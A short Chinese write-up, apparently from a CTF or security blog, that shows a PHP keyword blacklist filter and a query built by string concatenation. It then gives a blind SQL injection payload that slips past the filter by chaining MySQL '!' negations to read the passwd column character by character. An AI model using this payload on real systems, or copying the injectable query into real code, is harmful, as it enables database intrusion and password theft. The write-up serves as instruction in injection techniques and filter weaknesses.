参数过滤以及传递如下:
function filter($str){
$filter = "/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i";
if(preg_match($filter,$str)){
die("you can't input this illegal char!");
}
return $str;
}
function show($username){
global $conn;
$sql = "select role from `user` where username ='".$username."'";
$res = $conn ->query($sql);
if($res->num_rows>0){
echo "$username is ".$res->fetch_assoc()['role'];
}else{
die("Don't have this user!");
}
}
基本上注入常用的都过滤了,但是没有过滤(、)、'、",payload如下:
username="'!=!!(ascii(mid((passwd)from(1)))=51)!=!'"
这里利用的是MySQL逻辑处理:
TIM截图20170422155235.png
TIM截图20170422155436.png
无论几个逻辑“!”的处理,结果都是!(value);
于是在利用中查询成功的逻辑为:
username=!空=!0=1
